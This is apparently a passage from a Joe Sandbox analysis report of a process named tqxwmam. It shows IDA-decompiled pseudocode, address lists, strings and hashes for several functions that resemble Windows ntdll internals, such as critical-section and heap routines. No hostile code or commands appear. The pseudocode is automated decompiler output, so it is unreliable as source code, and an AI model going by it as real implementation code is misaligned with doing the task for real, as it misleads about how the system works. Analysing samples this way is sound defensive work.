                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AAF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AAF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                    0x00aaf71d
                                                    0x00aaf722
                                                    0x00aaf726
                                                    0x00af4770
                                                    0x00aaf765
                                                    0x00aaf769
                                                    0x00aaf769
                                                    0x00aaf732
                                                    0x00af477a
                                                    0x00000000
                                                    0x00af477a
                                                    0x00aaf738
                                                    0x00aaf73a
                                                    0x00aaf73c
                                                    0x00aaf73f
                                                    0x00aaf746
                                                    0x00aaf778
                                                    0x00aaf7a9
                                                    0x00aaf7a9
                                                    0x00aaf754
                                                    0x00aaf75a
                                                    0x00aaf75d
                                                    0x00aaf75f
                                                    0x00aaf761
                                                    0x00aaf76f
                                                    0x00aaf771
                                                    0x00aaf771
                                                    0x00aaf76f
                                                    0x00aaf763
                                                    0x00000000
                                                    0x00aaf763
                                                    0x00aaf77d
                                                    0x00aaf7a3
                                                    0x00aaf7a5
                                                    0x00000000
                                                    0x00aaf7a5
                                                    0x00aaf77f
                                                    0x00aaf782
                                                    0x00aaf784
                                                    0x00aaf786
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aaf788
                                                    0x00aaf748
                                                    0x00aaf74d
                                                    0x00aaf78d
                                                    0x00aaf793
                                                    0x00aaf7b7
                                                    0x00aaf7bc
                                                    0x00000000
                                                    0x00aaf7bc
                                                    0x00aaf798
                                                    0x00000000
                                                    0x00000000
                                                    0x00aaf79d
                                                    0x00aaf7b0
                                                    0x00000000
                                                    0x00aaf7b0
                                                    0x00aaf79f
                                                    0x00000000
                                                    0x00aaf74f
                                                    0x00aaf74f
                                                    0x00000000
                                                    0x00aaf74f

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx
                                                    • API String ID: 0-89312691
                                                    • Opcode ID: aa8b871aa6c9ed9b6f9bd9a5df709e579884e36cfbfb05c7eed8a16049adad32
                                                    • Instruction ID: af5261888b7928429676a23797b8f2f77e9cecee30e226d0a62d04822c818d36
                                                    • Opcode Fuzzy Hash: aa8b871aa6c9ed9b6f9bd9a5df709e579884e36cfbfb05c7eed8a16049adad32
                                                    • Instruction Fuzzy Hash: 7E118B35B046528FEB7C4F9D8890636B2A6AB97764F35453EE462CB3D1EB70CC408380
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B38DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E00B38DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xb60d50);
				E00ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E00B15720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L00ADDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L00ADDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E00ADD130(_t34, _t39, _t40);
			}





                                                    0x00b38df1
                                                    0x00b38df1
                                                    0x00b38df1
                                                    0x00b38df1
                                                    0x00b38df1
                                                    0x00b38df1
                                                    0x00b38df3
                                                    0x00b38df8
                                                    0x00b38dfd
                                                    0x00b38e00
                                                    0x00b38e0e
                                                    0x00b38e2a
                                                    0x00b38e36
                                                    0x00b38e38
                                                    0x00b38e3c
                                                    0x00b38e46
                                                    0x00b38e46
                                                    0x00b38e36
                                                    0x00b38e50
                                                    0x00b38e56
                                                    0x00b38e59
                                                    0x00b38e5c
                                                    0x00b38e60
                                                    0x00b38e67
                                                    0x00b38e6d
                                                    0x00b38e73
                                                    0x00b38e74
                                                    0x00b38eb1
                                                    0x00b38ebd

                                                    Strings
                                                    • Critical error detected %lx, xrefs: 00B38E21
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Critical error detected %lx
                                                    • API String ID: 0-802127002
                                                    • Opcode ID: 12983b1dd9f954bb3feef07d64b5a5367a869568ba1ef1e5359b22a8d719b93b
                                                    • Instruction ID: 3be993c91ec6ebdf116fd261bc19e828511b83832599fb60e49e289ce583fe8c
                                                    • Opcode Fuzzy Hash: 12983b1dd9f954bb3feef07d64b5a5367a869568ba1ef1e5359b22a8d719b93b
                                                    • Instruction Fuzzy Hash: F2113975D54348DADB25DFA4850679DBBF0FB04314F30429EE42A6B392CB740A01CF15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B1FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00B1FF60
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                    • API String ID: 0-1911121157
                                                    • Opcode ID: 6b132d38d8fe7c7a5e8bf82327d74aab7cbe0ddc814b9c9982531f406b25e9f0
                                                    • Instruction ID: 14c7511f023fc04995acf4ad1e0152f30453112e77addf7e5cfda0aa2be5f925
                                                    • Opcode Fuzzy Hash: 6b132d38d8fe7c7a5e8bf82327d74aab7cbe0ddc814b9c9982531f406b25e9f0
                                                    • Instruction Fuzzy Hash: 5111C475951544EFDB22DB50CD49FE877F1FF08704F548094F1096B2A2CB799981CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B55BA5 Relevance: .6, Instructions: 592COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E00B55BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xb61178);
				E00ADD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E00B54C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00ACD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E00B55542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0xb760e8;
								if( *0xb760e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0xb760e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E00AC9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E00AC6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E00ACF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E00ACF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E00ACF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E00ACFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E00ACFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E00ACF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E00ACF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E00B54CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E00ADD130(_t427, _t494, _t511);
				}
			}










































































                                                    0x00b55ba5
                                                    0x00b55baa
                                                    0x00b55baf
                                                    0x00b55bb4
                                                    0x00b55bb6
                                                    0x00b55bbc
                                                    0x00b55bbe
                                                    0x00b55bc4
                                                    0x00b55bcd
                                                    0x00b55bd3
                                                    0x00b55bd6
                                                    0x00b55bdc
                                                    0x00b55be0
                                                    0x00b55be3
                                                    0x00b55beb
                                                    0x00b55bf2
                                                    0x00b55bf8
                                                    0x00b55bfe
                                                    0x00b55c04
                                                    0x00b55c0e
                                                    0x00b55c18
                                                    0x00b55c1f
                                                    0x00b55c25
                                                    0x00b55c2a
                                                    0x00b55c2c
                                                    0x00b55c32
                                                    0x00b55c3a
                                                    0x00b55c3f
                                                    0x00b55c42
                                                    0x00b55c48
                                                    0x00b55c5b
                                                    0x00b55c5b
                                                    0x00b55c2c
                                                    0x00b55cb7
                                                    0x00b55cb9
                                                    0x00b55cbf
                                                    0x00b55cc2
                                                    0x00b55cca
                                                    0x00b55ccb
                                                    0x00b55ccb
                                                    0x00b55cd1
                                                    0x00b55cd7
                                                    0x00b55cda
